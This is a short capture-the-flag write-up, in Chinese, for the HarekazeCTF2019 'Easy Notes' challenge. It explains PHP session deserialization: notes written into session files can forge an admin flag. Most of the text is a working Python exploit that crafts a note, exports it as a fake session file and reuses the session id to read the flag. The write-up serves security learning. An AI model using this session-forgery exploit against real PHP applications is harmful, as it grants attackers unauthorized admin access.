[HarekazeCTF2019]Easy Notes

  • session反序列化

session在php中的存储方式为为 键名+竖线+经过serialize函数序列处理的值 ,这就可以伪造 admin

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import re
import requests

URL = 'http://e2cec884-8829-4092-a14e-072d64de4f5f.node4.buuoj.cn:81/'

while True:
    # login as sess_
    sess = requests.Session()
    sess.post(URL + 'login.php', data={
        'user': 'sess_'
    })

    # make a crafted note
    sess.post(URL + 'add.php', data={
        'title': '|N;admin|b:1;',
        'body': 'hello'
    })

    # make a fake session
    r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
    print(r)

    sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
    print(sessid)

    # get the flag
    r = requests.get(URL + '?page=flag', cookies={
        'PHPSESSID': sessid
    }).content.decode('utf-8')
    flag = re.findall(r'flag\{.+\}', r)

    if len(flag) > 0:
        print(flag[0])
        break